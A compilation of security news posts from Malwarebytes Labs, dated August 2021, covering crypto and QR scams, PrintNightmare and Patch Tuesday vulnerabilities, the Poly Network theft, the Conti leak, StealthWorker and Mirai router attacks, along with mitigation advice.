IT NEWS

A fair few cryptocurrency scams have been doing the rounds across 2021. Most of them are similar if not identical to tactics used in previous years with an occasional twist. Here’s some of the most visible ones you should be steering clear of.

Recovery code theft

Many Bitcoin wallets make use of something called recovery codes. These are, as the name suggests, codes allowing you to regain access to wallets you’ve locked yourself out of. These are the last roll of the dice for anyone unable to view their funds, and not a situation people would wish to find themselves in. As a result, they’re a fantastic target for scammers wanting to do some wallet plundering.

One of the sneakiest ways to grab a code is to jump into customer support discussions on social media. Scammers set up fake customer support style accounts, then direct potential victims to phishing pages hosted elsewhere. If you lose a recovery code or its equivalent in this manner, it’s almost certainly gone for good. Always ensure the entity you’re talking to is:

• The official support channel and
• you haven’t inadvertently started talking to someone else entirely.

By doing this, your digital funds should be kept safe from this technique.

Fake Elon Musk cryptocurrency scams

Another social media shenanigan involving cryptocurrency? You bet. This tactic involves stealing verified Twitter accounts, making them resemble Elon Musk, and then spamming bogus Bitcoin offers in replies to viral tweets.

This has been happening for quite some time now, and refuses to go away. It’s not pocket change, either. The FTC estimates at least $2 million has been stolen from cryptocurrency investors. It’s not just happening on Twitter, either. Rogue SpaceX crypto scams were doing the rounds back in June of this year.

If in doubt, remember that Elon is not going to make you rich beyond your wildest dreams with Bitcoin.

Covert container mining

This one is a bit more technical than most, and relies on bad things happening behind the scenes. There’s no direct social engineering aspect, because that’d give the game away.

If you’re a developer working on a project, it’s common to make use of pre-made code libraries. There are all kinds of ways to give your project a leg up, but one of the most popular is Docker. Docker bundles up all the things your project needs (including operating systems, applications, and other people’s projects it depends upon) in a “container”, a self-contained, portable environment. Because why write code if somebody’s already written it for you?

Turns out this area of work wasn’t safe from crypto-antics either. Rogue mining images involved in cloud-based mining attacks were discovered sitting on Docker Hub. The images contained software people might want to include in their Docker project, along with a cryptominer that would churn away in the background, making cryptocoins for somebody else at your expense.

This is a tricky one to avoid, but you can make a start by checking out the list of image names which could indicate bad files ahoy here. 30 malicious images downloaded roughly 20 million times(!) equals an awful lot of potential mining activity taking place.

419 crypto scam

Advance fee fraud scams involve sending dubious chunks of cash to / from a victim’s bank account. The money vanishes without trace, and the victim becomes a money mule, and is left carrying the blame.

We recently saw a mail along these lines. Nothing new there. However, this one asks victims to install a wallet app and transfer funds.This is not something you want to be doing. The scammers wants people to get in touch on WhatsApp, where they may well ask for additional personal information. This could easily be used elsewhere in other scams.

Conclusion

There’s many more crypto-scams waiting in the wings, but these are the ones we tend to see the most of. Give yourself a head start and learn to spot the signs of attempted compromise out there in the wild. Your digital wallet will thank you for it.

The post Crypto-scams you should be steering clear of in 2021 appeared first on Malwarebytes Labs.

I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.

PrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.

What happened?

In June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as CVE-2021-1675. At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.

In a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability listed as CVE-2021-34527 was introduced under the name PrintNightmare.

Ominously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.

At the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, Benjamin Delpy showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.

On July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 21-04, “Mitigate Windows Print Spooler Service Vulnerability” because it became aware of multiple threat actors exploiting PrintNightmare.

Also in July, CrowdStrike identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.

An end to the nightmare?

In the August 10 Patch Tuesday update, the Print Spooler service was subject to yet more patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.

In an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.

Just one day later

On August 11, Microsoft released information about CVE-2021-36958, yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who demonstrated the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.

Mitigation

The workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:

• Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.
• For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.

Microsoft says it is investigating the vulnerability and working on (yet another) security update.

Like I said yesterday: To be continued.

The post Microsoft’s PrintNightmare continues, shrugs off Patch Tuesday fixes appeared first on Malwarebytes Labs.

The largest crypto-robbery in history is rapidly turning into the most bizarre as well. Let’s start at the beginning…

In an apparent scream for mercy, 21 hours ago the Poly Network Team reached out via Twitter to “hacker(s)” that had managed to transfer roughly $600 million in digital tokens out of its control and into separate cryptocurrency wallets.

It alerted the world to what looks like the biggest crypto-heist in history, dwarfing even the landmark Mt. Gox theft in 2014.

Dear Hacker,

We are the Poly Network team.

We want to establish communication with you and urge you too return the hacked assets.

The amount of money you hacked is the biggest one in the defi history. Law enforcement in any country will regard this as a major economic crime and you will be pursued. It is very unwise for you to do any further transactions. The money you stole are from tens of thousdands of crypto community members, hence the people.

You should talk to us to work out a solution.

Poly Network Team

Poly Network describes itself as a project to “implement interoperability between multiple chains” and says it has already integrated Bitcoin, Ethereum, Neo, Ontology, Elrond, Ziliqa, Binance Smart Chain, Switcheo, and Huobi ECO Chain. What really matters though, is that underneath all that, it’s a website users can join their cryptocurrency wallets to. Something that makes both legitimate trading and theft much easier.

Insecure code

As with any exchange type of robbery (and they are many, and frequent) there are screams about inside jobs. The Poly Network team says hackers have exploited a vulnerability in its system to steal about $267m of Ether currency, $252m of Binance coins, and roughly $85 million in USDC tokens. According to Poly Network a preliminary investigation found a hacker exploited a “vulnerability between contract calls” (contracts are code stored on blockchains).

Not long after the heist, SlowMist published a post on Medium explaining the vulnerability. Cutting to the chase, the important part of the analysis is this bit: “After replacing the address of the keeper role, the attacker can construct a transaction at will and withdraw any amount of funds from the contract.” In other words, the Poly Network code had a bug that allowed attackers to make themselves the owner of other people’s money.

Freezing accounts

Poly Network has blocklisted the addresses of the cryptocurrency was transferred into. It said it is also working with its partners to freeze the hackers’ accounts. This is a step that can make it harder for the thieves to use stolen money. Cryptocurrency payments are pseudonymous but they are not private: Every transaction is traceable and if everyone agrees not to trade with blocklisted accounts they are essentially frozen.

Making it impossible for the thieves to move the stolen cryptocurrency would certainly make them more admissible for negotiations. After all, what is your full bank account worth if you can never hope to spend the money?

A rough time for cryptocurrencies

Like any technology, cryptocurrencies are neutral, neither intrinsically good or bad, but they do have a way of attracting bad news. Poorly-secured exchanges, exit scams, pump-and-dump scams, inside jobs, and colossal thefts are part of the furniture. Cryptocurrencies are also popular for tax evasion and, of course, an essential part of the recent boom in ransomware.

Recently, we have seen a call to action from governments that want more oversight and control over cryptocurrencies. Their concern isn’t following where the money goes, that’s easy, but linking real identities to the anonymous IDs used in blockchain transactions.

Among those contributing to the mood music that “something must be done” about cryptocurrencies, the US senate is getting ready to vote on a bipartisan infrastructure package, which would impose more federal regulation on cryptocurrencies; the director of the Dutch economic advisory Centraal Planbureau (CPB) has argued that all cryptocurrencies should be banned; Turkey has banned cryptocurrencies as a legal from of payment; India is considering whether to make the mining and possession of cryptocurrencies illegal; and China has banned initial coin offerings and announced a crack down on Bitcoin mining and trading.

Listening to the plea?

Poly Network provided the hacker with three addresses and as it seems the hackers have been busy returning some funds. At the time of writing they had returned less than 1 percent of the money,

You should be able to follow the developments in this thread on Twitter.

Update 11 August, 15:10 UTC. It gets weirder

Elliptic reports that the crypto-robber has now returned $258 million worth of cryptocurrency, suggesting that the crypto-robber may be serious about returning all the stolen money.

Negotiations between Poly Network and the thief started early and appear to be going well. Communicating via metadata on Ether transactions, the thief declared early on (about 12 hours ago) they were “NOT SO INTERESTED IN MONEY, NOW CONSIDERING RETURNING SOME TOKENS”.

In response, Poly Network offered an undisclosed “security bounty”, and dangled the carrot of notoriety, saying: “We want to offer a security bounty and we hope it will be remembered as the biggest white hat hack in the history.”

Seeming to prefer the role of hero over villain, the thief replied “IT’S ALREADY A LEGEND TO WIN SO MUCH FORTUNE. IT WILL BE AN ETERNAL LEGEND TO SAVE THE WORLD”.

As if that wasn’t weird enough, in a further bizarre twist, the thief has also declared they are taking donations, should anyone wish to thank them for returning all the money, or finding the bug, or something.

The post Thief pulls off colossal, $600m crypto-robbery …and gives the money back appeared first on Malwarebytes Labs.

Rogue QR code antics have been back in the news recently. They’re not exactly a mainstay of fakery, but they do tend to enjoy small waves of popularity as events shaped by the real world remind everyone they still exist.

The most notable example where this is concerned is of course the pandemic. With the spread of Covid-19, people and organisations naturally wanted to move away from physical contact. Contactless cards were in, and so too were QR codes. This was fertile ground for scammers to move back into a pact they may have long since abandoned.

Even outside of scams, the use of QR codes as a safe way to do important things is questionable. The problem with QR codes stems from how easy they are to use. Point your smartphone’s camera at a QR code and your phone will happily read it, convert it to a URL, and then open the URL in your browser. Very trusting.

What’s happening this time?

The Better Business Bureau are warning us to be on the lookout for QR code scams. The latest example they give is of a student sent a letter about loan consolidation. The letter contained links to an official .gov site, and also included “a barcode and QR code that looked legitimate”. Unfortunately once the victim contacted the scammers by phone, they were tricked into an eventual loss of just over a thousand dollars. You can see an older example of such a scam tactic here. Whether by QR code and bogus website or plain old unsolicited telephone call, the outcome is typically the same. Monthly fees going out of the victim’s bank account until they notice something is wrong.

Tracker tricks

We took a look at some of the recent examples listed in the BBB scam tracker. This is where people essentially crowdsource scams they encounter, adding them into the tracker database.

There was no common pattern between scam types, which ran the range of phishing and identity theft to employment fakouts and bank imposters. With that in mind, here’s the ones which caught our eye:

Trading for QR codes

One person claims they lost $5,100 after a stranger reached out on Instagram and convinced them to get into the wild world of forex (Foreign Exchange) trading. The discussion was moved to WhatsApp where a “withdrawal fee” of $4,102 was sent to a supplied QR code. When more requests for cash happened, the victim became suspicious.

A scam of utility

Another scam of note was related to utility services. A victim claims they were told their electricity would be turned off within 20 minutes. The only way to fix this was to pay an unpaid bill by going to a nearby gas station and sending $900 or so dollars via a QR code. The QR code downloaded a Bitcoin app, and at that point they presumably became suspicious and went no further.

Of employment, supplies, and money muling

As you’ve seen, sending potential victims to gas stations to use Bitcoin ATMs is a popular technique. Perhaps the most shocking example we saw was along these same lines. The victim didn’t lose any money, but they did lose an awful lot of time, and experienced what must have been a lot of stress.

Our subject applied for a virtual job at a new organisation, after uploading their resume to a job hunt website. The entire job interview was performed using the secure messaging app Telegram, which is somewhat unusual. They sent their supposed new employers a copy of their driving license and other personal information. The victim was then sent $5,000 to “purchase equipment” for their job, and instructed to send $4,800 to their “software vendor’s” Bitcoin address via a gas station ATM.

It wasn’t long before they were given the cold shoulder by the people asking them to receive and send money. They had almost certainly been used as a money mule: Laundering dubious funds by breaking the link between the sender and the recipient, thanks to the gas station ATM.

In most cases, the QR code isn’t some sort of surprise gotcha. Nothing leaps out at the victim and drops malware, or pops something terrible on the desktop. No, the scammers are using them the same way regular folks do—for convenience. They’re simply a means of getting the victim in front of an ATM machine. From there, they set the ball rolling to part them from their money (or have them act as the conduit for ill-gotten gains).

Avoiding QR scams

If you’re dealing with QR codes in public, on ads or posters, check that they haven’t been tampered with (look for stickers with a new QR code placed over an original).

QR codes in correspondence can be trickier. The trick is to remember that a QR code is easy to create and is no more trustworthy than any other word or web address. When dealing with codes from businesses you’ve dealt with, try to confirm the code is genuine. If the code opens a website asking for login details, confirm that it’s the company’s legitimate address. Asking for logins from QR codes is risky behaviour and should really be avoided whether a real code or not.

And if anyone tries to steer you towards a Bitcoin ATM, move swiftly in the opposite direction.

Follow these rules and you’ll hopefully avoid any code-based pitfalls.

The post If a QR code leads you to a Bitcoin ATM at a gas station, it’s a scam appeared first on Malwarebytes Labs.

An investigation by Twitter into racist tweets levied against three Black players on the English football team following the national hopefuls’ loss against Italy last month revealed that anonymity played almost no role in whether users posted abusive comments from their accounts.

The analysis, which revealed that 99 percent of the accounts that Twitter suspended were not anonymous, provides the latest evidence that requiring real identities on social media platforms will not lead to any measurable decrease in online abuse.

“While we have always welcomed the opportunity to hear ideas from partners on what will help, including from within the football community, our data suggests that ID verification would have been unlikely to prevent the abuse from happening – as the accounts we suspended themselves were not anonymous,” Twitter UK wrote in a blog post. “Of the permanently suspended accounts from the Tournament, 99% of account owners were identifiable.”

According to Twitter, its own automated tools to find and remove abusive content are working: The company’s internal tech tools found and removed 1,662 harmful tweets during the UEFA Euro 2020 Final and in the 24 hours following the match. By July 14—three days after the final—that number grew to 1,961, though the total included 126 tweets that were removed due to non-automated reporting by “trusted partners,” Twitter said.

The racism directed against England’s players drew immediate attention after the team’s loss in one of the most anticipated football matches in the country’s recent history. As the match closed with a 1 – 1 tie, three of England’s players shot penalty kicks. All three missed.

According to Vice, the three penalty kickers were called racist slurs on Instagram, faced racist comments on Twitter, and received “direct threats to their safety, in far-right and neo-Nazi channels” on Telegram.

The proposed solutions to this type of abuse are as old as the abuse itself. As we discussed on the Lock and Code podcast with Electronic Frontier Foundation Director of Cybersecurity Eva Galperin, commentators often suggest that social media companies require a person to provide their real identity when creating an account and using a platform.

“The premise is that if people used their real names that they would not post this kind of harassing content,” Galperin said. “That if your name was next to every opinion you had, that you would be more careful about the things that you say online.”

But, Galperin said, the premise falls apart when looking at the real world.

“This assumes a level of shame that is simply not there,” Galperin said. “People are willing to be tremendous jerks online. And the more powerful that they are offline, the more likely it is that they will act as bullies online and that they will put their names next to it and feel no shame whatsoever.”

Now, after decades of this dynamic being recognized by online privacy experts, it appears that Twitter has joined the crowd that says that, thankfully, anonymity is not worth destroying.

The post Twitter says it out loud: Removing anonymity will not stop online abuse appeared first on Malwarebytes Labs.

The sheer number of patches (44 security vulnerabilities) should be enough to scare us, but unfortunately we have gotten used to those numbers. In fact, 44 is a low number compared to what we have seen on recent Patch Tuesdays. So what are the most notable vulnerabilities that were patched.

• One actively exploited vulnerability
• One vulnerability that has a CVSS score of 9.9 out of 10
• And yet another attempt to fix PrintNightmare

Let’s go over these worst cases to get an idea of what we are up against.

CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

Actively exploited

CVE-2021-36948 is an elevation of privilege (EoP) vulnerability in the Windows Update Medic Service. The Windows Update Medic Service is a background service that was introduced with Windows 10 and handles the updating process. Its only purpose is to repair the Windows Update service so that your PC can continue to receive updates unhindered. Besides on Windows 10 it also runs on Windows Server 2019. According to Microsoft CVE-2021-36948 is being actively exploited, but it is not aware of exploit code publicly available. Reportedly, the exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversaries toolbox. The bug is only locally exploitable, but local elevation of privilege is exactly what ransomware gangs will be looking to do after breaching a network, for example.

9.9 out of 10

CVE-2021-34535 is a Remote Code Execution (RCE) vulnerability in Windows TCP/IP. This is remotely exploitable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCPIP packet to its host. This vulnerability exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.

This vulnerability received a CVSS score of 9.9 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.

9.8 out of 10

Another high scorer is CVE-2021-26432, an RCE in the Windows Services for NFS ONCRPC XDR Driver. Open Network Computing (ONC) Remote Procedure Call (RPC) is a remote procedure call system. ONC was originally developed by Sun Microsystems. The NFS protocol is independent of the type of operating system, network architecture, and transport protocols. The Windows service for the driver makes sure that Windows computers can use this protocol. This vulnerability got a high score because it is known to be easy to exploit and can be initiated remotely.

More RDP

CVE-2021-34535 is an RCE in the Remote Desktop Client. Microsoft lists two exploit scenarios for this vulnerability:

• In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.
• In the case of Hyper-V, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer when a victim running on the host connects to the attacking Hyper-V guest.

Since this is a client-side vulnerability, an attacker would have to convince a user to authenticate to a malicious RDP server, where the server could then trigger the bug on the client side. Combined with other RDP weaknesses however, this vulnerability would be easy to chain into a full system take-over.

Never-ending nightmare of PrintNightmare

The Print Spooler service was subject to yet more patching. The researchers behind PrintNightmare predicted that it would be a fertile ground for further discoveries, and they seem to be right. I’d be tempted to advise Microsoft to start from scratch instead of patching patches on a very old chunk of code.

CVE-2021-36936 an RCE vulnerability in Windows Print Spooler. A vulnerability that was publicly disclosed, which may be related to several bugs in Print Spooler that were identified by researchers over the past few months (presumably PrintNightmare).

CVE-2021-34481 and CVE-2021-34527 are RCE vulnerabilities that could allow attackers to run arbitrary code with SYSTEM privileges.

Microsoft said the Print Spooler patch it pushed this time should address all publicly documented security problems with the service. In an unusual step, it has made a breaking change: “Today we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges.”

To be continued, we suspect.

The post PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday appeared first on Malwarebytes Labs.

Synology PSIRT (Product Security Incident Response Team) has put out a warning that it has recently seen and received reports about an increase in brute-force attacks against Synology devices. PSIRT suspects the botnet commonly known as StealthWorker is responsible for this increase in activity.

Synology

Synology specializes in data storage and most people will know it because of its Networked Attached Storage (NAS) devices. These NAS devices seem to be what the botnet is targeting. The company does not believe the botnet is exploiting vulnerabilities in its software, it’s simply going after weak or default passwords using brute force guessing.

In a brute force guessing attacks, software attempts to find a device’s password with a bit of educated guesswork (typically by using a list of known, common passwords). It tries a password, sees if it works, and if it doesn’t, tries another, and another, and another, until it either guesses a password correctly or exhausts its list and moves on.

In this case, if a password is guessed successfully, the device is infected with malware that will carry out additional attacks on other devices.

StealthWorker

We reported about Trojan.StealthWorker.GO in February of 2019 when it emerged as a brute forcer written in Golang that was discovered to be involved in a rise in attacks against e-commerce websites. Golang is a statically-typed, compiled, general-purpose programming language that we see more often in the current malware landscape. Shortly after the involvement in CMS platforms StealthWorker started to target Linux and Windows machines.

In June 2020, Akamai researchers uncovered a malware campaign spreading Golang-based malicious code that was also attributed to StealthWorker. It was found targeting Windows and Linux servers running popular web services and platforms like WordPress, Drupal, Joomla, and Magento. One significant factoid discovered back then was that cleaning the compromised system was not enough. It would be re-infected within minutes if the password stayed the same. This would indicate either a very efficient brute-force technique or, perhaps more likely, the use of a method to store and retrieve passwords that were once guessed right.

Once deployed on a compromised machine, the malware creates scheduled tasks on both Windows and Linux to gain persistence and, as Synology warned, then deploys second-stage malware payloads. Botnets can be used to spread other malware like cryptojackers and ransomware. Or your device can be used in DDoS or click-fraud campaigns. On CMS platforms the botnet can equip a compromised e-commerce website with an embedded skimmer that steals personal information and payment details when unsuspecting customers enter them into the website.

Mitigation

Synlogy says it is working with multiple CERT organizations worldwide in an attempt to locate and take down the botnet’s command and control servers.

Synology recommends that all users check their system for weak administrative credentials and change them if necessary. Synology also recommends enabling auto block and account protection. Finally, you should set up multi factor authentication (MFA) where possible.

Synology also advises users to enable Snapshot to keep their NAS safe from encryption-based ransomware. This performs a regular, off-site backup. More Synology NAS-specific security advice can be found on its site.

The company’s advice is also valid for any other Internet-facing NAS devices. Synology only reports these attacks are performed on its devices, but that might be because it is where they have a clear picture of what’s going on. It does not mean other devices are being neglected by the botnet. There is no reason for StealthWorker, or other botnets, to pass up on other manufacturer’s devices.

Stay safe, everyone!

The post Check your passwords! Synology NAS devices under attack from StealthWorker appeared first on Malwarebytes Labs.

Last week, The Record broke the news that a self-described “pen tester” for the infamous Conti ransomware gang, who goes by the handle m1Geelka, had leaked manuals, technical guides, and software on the underground forum XSS. According to the screenshot of m1Geelka’s original forum post—and screenshots of later ones from several security researchers being passed around on Twitter—their problem seems to be (surprise, surprise) money: Conti isn’t paying “hard workers” enough of what it extorts.

If you’ve heard of Conti, it’s likely in connection with a devastating attack on Ireland’s Health Service Executive in May. The attack affected the provision of healthcare across the entire country, causing hundreds of thousands of appointments to be scrapped.

m1Geelka’s rant starts:

Dumb divorce, not work. They recruit penetration testers, of course … They recruit guys to test Active Directory networks, they use the Locker – Conti. I merge you their 10-address of cobalt servers and type of training materials. 1500 $ yes, of course, they recruit suckers and divide the money among themselves, and the boys are fed with what they will let them know when the victim pays.

The reference to “their 10-address cobalt servers and type of training materials” refers to the materials m1Geelka leaked on the forum, which included the IP addresses of the Conti gang’s Cobalt Strike command and control servers.

Aside from the tactics, techniques and procedures (TTPs), the leak comes with a few interesting lessons:

Ransomware is an industry

The leak further reinforces something we already knew: That ransomware is a mature criminal business that includes cooperation between groups, the division of labor, the division of work, extensive outsourcing and competition for skilled workers.

According to one observer, Conti’s recruitment on the XSS forum tries to induce potential “pen testers” like m1Geelka with familiar-sounding work conditions, such as fully remote working, a salary of $1,500 plus a percentage of the spoils from attacks, and a five-day work week (yup, you get weekends off).

Others reported that m1Geelka later suffered a case of buyer’s remorse and walked back some of their claims, saying they were never an affiliate of Conti and that they had only leaked data that was already public. Perhaps somebody reminded them that some things are done differently in the underground economy.

Everyone is vulnerable to insider threats

Although some see this leak as an example of there being “no honor among thieves”, it isn’t. Disgruntled employees or contractors exist in all walks of life, and occasionally take out their frustration on employers’ computers, networks, and data. The leak is simply another example of how unexceptional the ransomware economy is.

These kind of incidents happens everywhere—they even happen at the FBI—and, according to the UK’s National Crime Agency, they happened more in 2020 than in 2019 because of the disruption caused by the pandemic.

Which means it can happen to you, and your approach to security should account for it.

Conti cares about your revenue

Modern ransomware attacks are often described as “targeted”, but there is some misunderstanding about what that means. Most of the time it means that attackers focus on one target at a time, rather than attacking as many targets as possible.

A small detail of the Conti leak reported by NBC shows that Conti documentation encourages attackers to investigate potential targets in Google—searching for “WEBSITE + revenue”—and reminds them to check multiple sources, so they get an accurate number.

The advice appears in “MANALS_V2 Active Directory”, listed in a section called “Increasing privileges and collecting information”, and appears to be one of the steps attackers are told to take after breaking into a target’s network. If attackers are discovering this kind of information after they’ve broken in rather than before, it shows they aren’t going after specific targets, merely vulnerable ones.

The post Ransomware turncoat leaks Conti data, lifts the lid on the ransomware business appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• RDP brute force attacks explained
• The 3 biggest threats reaching for your antivirus software’s off switch
• Zoom and gloom? Video comms org agrees to settle for $85m
• COVID-19 vaccine appointment system attacked in Italy
• Chrome casts away the padlock – is it good riddance or farewell?
• NSA issues advice for securing wireless devices
• What is Tor?
• Amazon will pay you $10 for your palm prints. Should you be worried?
• Edge’s Super Duper Secure Mode benchmarked: How much speed would you trade for security?
• Apple’s search for child abuse imagery raises serious privacy questions

Other cybersecurity news:

• New phishing attack “sneakier than usual” (Source: ZDNet)
• Can the public cloud become confidential? (Source: Help Net Security)
• UK’s Ministry of Defence coughs up bug bounties for crowdsourced pentesting (Source: The Register)
• FTC warns of phishing text scam (Source: Infosecurity Magazine)
• Chipotle marketing emails hijacked to spread malware (Source: Security Boulevard)
• Prometheus TDS: The $250 service behind recent malware attacks (Source: Bleeping Computer)
• Raccoon stealer bundles malware, propagates via Google SEO (Source: ThreatPost)
• Microsoft says LemonDuck malware could be tricky to shift (Source: TechRadar)
• Warning over Facebook scam in Redcar (Source: The Northern Echo)
• U.S. Attorney: Providence man turned to social media to help in fraud scheme (Source: The Providence Journal)

Stay safe!

The post A week in security (August 2 – August 8) appeared first on Malwarebytes Labs.

The early bird catches the worm. Unless the worm was early enough to hide.

On August 3, 2021 a vulnerability that was discovered by Tenable was made public. Only two days later, on August 5, Juniper Threat Labs identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.

Router firmware

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the description of CVE-2021-20090 you will find:

“a path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.”

But during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, Tenable lists some 36 devices that have been confirmed to be affected. The list of affected devices include some of today’s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.

The path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the Tenable TechBlog.

Quick response

Once again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, just hours after vulnerability details were published.

Mirai

Mirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected “smart” devices, like cameras, into a botnet.

You may remember hearing about this botnet after the massive East Coast internet outage of 2016 when the Mirai botnet was leveraged in a DDoS attack aimed at Dyn, an Internet infrastructure company. Traffic to Dyn’s Internet directory servers throughout the US—primarily on the East Coast but later on the opposite end of the country as well—was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.

After the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.

Mitigation

The vulnerability was patched in April and  owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the CERT Coordination Center for help with contacting and tracking all the affected vendors.

What is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.

The post Home routers are being hijacked using vulnerability disclosed just 2 days ago appeared first on Malwarebytes Labs.